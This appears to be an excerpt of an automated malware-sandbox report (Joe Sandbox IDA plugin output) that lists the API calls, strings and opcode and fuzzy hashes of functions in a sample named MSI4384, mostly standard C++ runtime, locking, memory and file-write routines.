                                                                    • Instruction ID: 48827fd857e5c4f02e24bdbbd32c2fbd8ae63596ed434d6fbec003aee6e202d4
                                                                    • Opcode Fuzzy Hash: 2033cb136ef1b9d1fce2125b6833441d7ab31aff227ae18f656f45ed3adfa4ed
                                                                    • Instruction Fuzzy Hash: 0121DDB1804B56AEDB25DF759880B6BBBF8AB0C304F04191FE499C7A42D778E605CB94
                                                                    APIs
                                                                    • _Maklocstr.LIBCPMT ref: 00437E6A
                                                                    • _Maklocstr.LIBCPMT ref: 00437E83
                                                                      • Part of subcall function 00437FB2: Concurrency::cancel_current_task.LIBCPMT ref: 00438054
                                                                    • _Maklocstr.LIBCPMT ref: 00437E92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Concurrency::cancel_current_task
                                                                    • String ID: :AM:am:PM:pm
                                                                    • API String ID: 980645097-1966799564
                                                                    • Opcode ID: ca7f68b948d55045c86837a7496df92683b29a248a139135d95c218cb060526f
                                                                    • Instruction ID: 868fc7ff20bdec782422256ded35c14d290254d0193bbb7292a45ec49c1ee602
                                                                    • Opcode Fuzzy Hash: ca7f68b948d55045c86837a7496df92683b29a248a139135d95c218cb060526f
                                                                    • Instruction Fuzzy Hash: E101ACB2D003047BDB10AFA59C46D9FB7BCEB85714F10441FF405A7141DB78AD058BA4
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A8E2
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A8EC
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A95D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: t:H
                                                                    • API String ID: 1383202999-4044820037
                                                                    • Opcode ID: e356f379ef772c34a64ea6bd2dfacfe92ae40ce72d6c212c6a49a9180107a6c2
                                                                    • Instruction ID: dc0486667268e528a2d65163c91645943a2e13e647dd22f3624d71840cfc9a2b
                                                                    • Opcode Fuzzy Hash: e356f379ef772c34a64ea6bd2dfacfe92ae40ce72d6c212c6a49a9180107a6c2
                                                                    • Instruction Fuzzy Hash: 01F0C27194011A5ADB08FEA1C856BAE2224AF44B18F51481EF550772D2DF3C8A04878A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A977
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A981
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A9F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: L:H
                                                                    • API String ID: 1383202999-3681532525
                                                                    • Opcode ID: 37b23e42239986a261a7e2d021482b38204d51dbfddd380f45f2d017927b0b62
                                                                    • Instruction ID: c7aaab55e1cd23e97fba0090b382e0e35d1aaae01a04608edc63b3d1f47129d9
                                                                    • Opcode Fuzzy Hash: 37b23e42239986a261a7e2d021482b38204d51dbfddd380f45f2d017927b0b62
                                                                    • Instruction Fuzzy Hash: CBF0C231940116A7DB08BEA1C852BAE2224AF44B1DF51081EF510772D1EF3C8A04878E
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AA0C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AA16
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AA87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: x:H
                                                                    • API String ID: 1383202999-4161664801
                                                                    • Opcode ID: 67db09e4f5dc43d6fa60c729c4d91ca578fdf1c900a2da7831dc8d506f44c8ee
                                                                    • Instruction ID: 734177de5823c01ff57d3b6d302427660ae52e121f1bd707bf559d0cb85f2253
                                                                    • Opcode Fuzzy Hash: 67db09e4f5dc43d6fa60c729c4d91ca578fdf1c900a2da7831dc8d506f44c8ee
                                                                    • Instruction Fuzzy Hash: 84F0F63294011A57CB08FFA1C852AAE2324AF54B18F64441FF550A72C1DF3C8A1487CE
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AAA1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AAAB
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AB1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: P:H
                                                                    • API String ID: 1383202999-3461603449
                                                                    • Opcode ID: 999fe1c6b4c9c9b5ee0da3a36e30a10c81902c61912c0d84ca3d5960610ecd91
                                                                    • Instruction ID: 518aae3efd0b884eb07f870a67bf54b15e1973492e396024ca2cbcaf4c29021a
                                                                    • Opcode Fuzzy Hash: 999fe1c6b4c9c9b5ee0da3a36e30a10c81902c61912c0d84ca3d5960610ecd91
                                                                    • Instruction Fuzzy Hash: 9FF0F031A4011A9ACB19FFA1C856BBE7321AF0471CF50441FF6206B2C2DF3C9A1487CA
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0044DE33,00000000,?,00483F04,?,?,?,0044DFD6,00000004,InitializeCriticalSectionEx,0047230C,InitializeCriticalSectionEx), ref: 0044DE8F
                                                                    • GetLastError.KERNEL32(?,0044DE33,00000000,?,00483F04,?,?,?,0044DFD6,00000004,InitializeCriticalSectionEx,0047230C,InitializeCriticalSectionEx,00000000,?,0044DD8D), ref: 0044DE99
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0044DEC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3177248105-2084034818
                                                                    • Opcode ID: 4656811069a8f74d9988c22eab74c56a1821305e0b515d6f30ac644958ef5256
                                                                    • Instruction ID: 00408afe52093db38381965393d37f777bb2c8ba07a7c9515cc6a5e669064253
                                                                    • Opcode Fuzzy Hash: 4656811069a8f74d9988c22eab74c56a1821305e0b515d6f30ac644958ef5256
                                                                    • Instruction Fuzzy Hash: 52E04F30684604B7EF211F61EC06F5A3F55AB11F52F304032FA4CE81E2E7EAE958958D
                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449561
                                                                    • ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449594
                                                                    • WakeAllConditionVariable.KERNEL32(00483B70,?,?,004226B7,00484714,0046EC90), ref: 0044959F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                    • String ID: t;H
                                                                    • API String ID: 1466638765-3893116676
                                                                    • Opcode ID: 0b7c40530ce7dfa28e754404c92fa8c26113df17da0b9e9c202a1eaf433f00ec
                                                                    • Instruction ID: e211024d9241d86e8dd56d4cef01755284b509274409170c8627337203834e7f
                                                                    • Opcode Fuzzy Hash: 0b7c40530ce7dfa28e754404c92fa8c26113df17da0b9e9c202a1eaf433f00ec
                                                                    • Instruction Fuzzy Hash: 06F039B5901200DFC304EF58FA48E9837E9FB0A756B10083EEA4583321DBB46900CBAD
                                                                    APIs
                                                                    • AcquireSRWLockExclusive.KERNEL32(00483B74), ref: 00449536
                                                                    • ReleaseSRWLockExclusive.KERNEL32(00483B74), ref: 00449543
                                                                    • WakeAllConditionVariable.KERNEL32(00483B70), ref: 0044954E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                    • String ID: t;H
                                                                    • API String ID: 1466638765-3893116676
                                                                    • Opcode ID: c587e26bad70a05fe4ab1df0c1c119198cba23e6daae887b9a99d971af584877
                                                                    • Instruction ID: bd6cc52a44f04ffb05879a74949db6a83ce9d5c53843998d70e0c8201294158f
                                                                    • Opcode Fuzzy Hash: c587e26bad70a05fe4ab1df0c1c119198cba23e6daae887b9a99d971af584877
                                                                    • Instruction Fuzzy Hash: 6ED09232546125EBC3006B95FC08AD97BA8EB0A7BBB110072F58982111A7A469048BEA
                                                                    APIs
                                                                    • _strcspn.LIBCMT ref: 0042EDA1
                                                                    • _strcspn.LIBCMT ref: 0042EDC5
                                                                      • Part of subcall function 0042B410: LocalAlloc.KERNEL32(00000040,F3E5235D,F3E52339,00000000,?,?,F3E52339,00000001,?,?,?,?,F3E52339,00000000,?), ref: 0042B466
                                                                      • Part of subcall function 0042B410: LocalFree.KERNEL32(F3E52339,?,?,?,?,?,?,F3E52339,00000001,?,?,?,?,F3E52339,00000000,?), ref: 0042B55D
                                                                    • LocalFree.KERNEL32(?), ref: 0042F1A5
                                                                    • LocalFree.KERNEL32(?), ref: 0042F1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$_strcspn$Alloc
                                                                    • String ID:
                                                                    • API String ID: 3422560186-0
                                                                    • Opcode ID: fac41fa2167349576140bd047e94d962d45f17da4c15d1997d2b34bd4778c898
                                                                    • Instruction ID: 2db11c599fa7f4499fde201656164eef96068ae3e8f03f578e3baf09bb04e4a5
                                                                    • Opcode Fuzzy Hash: fac41fa2167349576140bd047e94d962d45f17da4c15d1997d2b34bd4778c898
                                                                    • Instruction Fuzzy Hash: AB02A775E00219DFDB00CFA5D844AEEBBB5FF88304F94416AE805AB351DB38AD46CB95
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(F3E52339,00000000,00000000,?), ref: 004682FB
                                                                      • Part of subcall function 004612CA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,00000000,?,-00000008,-00000008,00000000,?,?,0045EB45,?,00000000), ref: 00461329
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00468551
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00468597
                                                                    • GetLastError.KERNEL32 ref: 0046863A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                    • String ID:
                                                                    • API String ID: 2112829910-0
                                                                    • Opcode ID: 751f86b87d233da4485cedf1cc23a84c3a2b08ab3ae57753b24cc68c846fc0c2
                                                                    • Instruction ID: a0f7f86aaf50bf9eb8d28c9a87ffa0524df5e356c818a0a9ef236141c6cad584
                                                                    • Opcode Fuzzy Hash: 751f86b87d233da4485cedf1cc23a84c3a2b08ab3ae57753b24cc68c846fc0c2
                                                                    • Instruction Fuzzy Hash: C6D1AF75D002489FCF15CFA8D8809AEBBB5FF09314F24422EE856EB351EA34A942CB55
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustPointer
                                                                    • String ID:
                                                                    • API String ID: 1740715915-0
                                                                    • Opcode ID: 29daa17f5ce303a0e334066e416f4272dfb071feb924155730f31d6ae1e966b3
                                                                    • Instruction ID: 76ee2c4e8bb5bf8c7b3d7d04fc5d5f4381f75bbf961c206339b93ebb319298d4
                                                                    • Opcode Fuzzy Hash: 29daa17f5ce303a0e334066e416f4272dfb071feb924155730f31d6ae1e966b3
                                                                    • Instruction Fuzzy Hash: 04510272602202AFFB658F51D881B7A73A6EF04704F28452FEC05472D1E73DAC59C799
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,/CB,?,00000000,?), ref: 004249BA
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,/CB,?,00000000,?), ref: 00424A04
                                                                    • LocalFree.KERNEL32(00000000,?,/CB,?,00000000,?), ref: 00424A85
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free
                                                                    • String ID: /CB
                                                                    • API String ID: 209276640-2413225141
                                                                    • Opcode ID: dfcac3467d2ed79a410cd27885314d5494b4db49b588496b7025b9fcd91d1d4e
                                                                    • Instruction ID: 73b69d04cd8254daa7bab4bb91ba3f4adab2048f56b1a21dc64ed7dfc148789c
                                                                    • Opcode Fuzzy Hash: dfcac3467d2ed79a410cd27885314d5494b4db49b588496b7025b9fcd91d1d4e
                                                                    • Instruction Fuzzy Hash: 1C41F0727042258BDB04DF68E88196FB3D5EBC8350B540A3EF951C7381EA74D919C7AA
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,?,?,0042432F,00000000,?), ref: 004248C9
                                                                    • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,?,?,0042432F,00000000,?), ref: 004248E5
                                                                    • LocalFree.KERNEL32(?,00000000,?), ref: 0042493B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free
                                                                    • String ID: /CB
                                                                    • API String ID: 209276640-2413225141
                                                                    • Opcode ID: 50342dee06f7c7ae8ff920ab75beafef065f4e17bd3430c3df40a55e0ecbdffb
                                                                    • Instruction ID: 35e98465c8f43c8cc78a396907d2a825e16c0a80f56e927c16bd25cab9ec259e
                                                                    • Opcode Fuzzy Hash: 50342dee06f7c7ae8ff920ab75beafef065f4e17bd3430c3df40a55e0ecbdffb
                                                                    • Instruction Fuzzy Hash: D33138B63002218BD718AF38E844A5F77D5EBC13A4FA4072EE562C72D0EB38DD408619
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ec67f2d13f226e72c7524f8fc50af9ca961c2320f41c869158a00b56ddd3a10
                                                                    • Instruction ID: 4f425c9868c564c3724c3658a52af1fdcf78f9e480a44fc78ce9871c097b83de
                                                                    • Opcode Fuzzy Hash: 2ec67f2d13f226e72c7524f8fc50af9ca961c2320f41c869158a00b56ddd3a10
                                                                    • Instruction Fuzzy Hash: 8C21A431604205FF9B20AF62DC41D6B77B9FF00369710852AFD5997252EB78EC188769
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00428D7C,00000000,?,?,?,?,?,?,?,00000000,0046BFF5,000000FF), ref: 004292A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                    • API String ID: 1452528299-1781106413
                                                                    • Opcode ID: 1a66fd132c50b9d195aa886b9204d760b49211ed7e8f2959ca77b1946543061e
                                                                    • Instruction ID: fee5028da73306ad88b1ea6833641138363020b42d2743972305d3236a97c68c
                                                                    • Opcode Fuzzy Hash: 1a66fd132c50b9d195aa886b9204d760b49211ed7e8f2959ca77b1946543061e
                                                                    • Instruction Fuzzy Hash: FB215E49B1026287CB745F3C940127AB2E5AF98755F65486FDCC8D7390EAAD8C82C399
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004349FC
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00434A06
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00434AAD
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00434AB8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                    • String ID:
                                                                    • API String ID: 4244582100-0
                                                                    • Opcode ID: a76138a12a83b20432db0f3921b44d423588c66e90c951b93d98928a98bcd3d3
                                                                    • Instruction ID: 5b4f0cdd54eaee2e669b1bad57377e88bc7b7a6f4b889547020e112a26ab6b24
                                                                    • Opcode Fuzzy Hash: a76138a12a83b20432db0f3921b44d423588c66e90c951b93d98928a98bcd3d3
                                                                    • Instruction Fuzzy Hash: A2217C34A40616AFDB04EF15C891AADB771FF88310F00945AE8259B7A1DB74FD14CF88
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,F3E52339), ref: 004318FC
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0043191C
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0043194D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00431966
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                    • String ID:
                                                                    • API String ID: 3604237281-0
                                                                    • Opcode ID: 3efcb6fd287d9e9bdb5687a4d450974ed5083301567b4a84314034e1799eb5d4
                                                                    • Instruction ID: 54ae9f3d883af8acfb07696e78411b84048e474769d29b431808222c8ffd0d32
                                                                    • Opcode Fuzzy Hash: 3efcb6fd287d9e9bdb5687a4d450974ed5083301567b4a84314034e1799eb5d4
                                                                    • Instruction Fuzzy Hash: 752181B0A40314EBD7209F54DC09FAFBBB8FF05B14F20452AF614A72D1E7B85A048799
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004340E3
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004340ED
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043413E
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043415E
                                                                    Memory Dump Source
